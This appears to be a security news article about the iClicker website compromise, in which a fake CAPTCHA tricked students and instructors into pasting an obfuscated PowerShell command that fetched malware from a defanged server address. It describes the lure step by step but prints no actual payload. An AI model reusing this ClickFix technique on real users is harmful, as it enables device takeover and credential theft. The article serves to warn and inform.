,

iClicker Website Compromised in Malware Attack Using Fake CAPTCHA

The website of iClicker, a widely used digital classroom engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA to trick users, primarily students and instructors, into executing a malicious PowerShell command on their devices.

May 12, 2025

Bisma Farrukh

iClicker, a subsidiary of Macmillan, is used by over 5,000 instructors and 7 million students at colleges across the U.S., including institutions like the University of Michigan and the University of Florida. The platform allows instructors to take attendance, conduct polls, and track student participation.

According to a security alert from the University of Michigan’s Safe Computing team, the attack occurred between April 12 and April 16, 2025. During this time, the iClicker homepage displayed a fake CAPTCHA prompt. Users were instructed to click “I’m not a robot” to proceed, but this was part of a deceptive social engineering tactic called ClickFix.

How the Attack Worked?

When a user clicked the CAPTCHA, a malicious PowerShell command was silently copied to their Windows clipboard. The CAPTCHA prompted users to open the Windows Run dialog (Win + R), paste the command (Ctrl + V), and execute it, believing it was a verification step.

This PowerShell command, though heavily obfuscated, connected to a remote server (http://67.217.228[.]14:8080) to fetch another script. The payload delivered varied based on the visitor:

  • Targeted users received a script that installed malware capable of giving attackers complete control over the infected device.
  • Non-targets, such as security sandboxes, received a benign file like the Microsoft Visual C++ Redistributable, masking the true intent of the attack.

The exact nature of the malware isn’t fully confirmed, but based on similar ClickFix campaigns, it likely included information-stealing malware capable of harvesting:

  • Browser cookies and saved passwords
  • Credit card and autofill data
  • Cryptocurrency wallet files (e.g., wallet.txt, seed.txt, metamask.txt)
  • Documents containing sensitive information

Stolen data would then be packaged and exfiltrated to attackers, potentially to be resold or used in broader attacks such as ransomware deployment or breaches of educational networks.

Institutional Response and Concealed Disclosure

While the attack has since been neutralized, Macmillan did not respond to media inquiries regarding the incident. However, iClicker quietly published a security bulletin on May 6, which included a <meta name=’robots’ content=’noindex, nofollow’ /> preventing it from appearing in search engine results and making it less accessible to the public.

Leave a Comment

Cyberalertica delivers credible cybersecurity news, threat analysis, privacy insights, and digital security trend coverage.

Categories

Company

CyberAlertica © 2025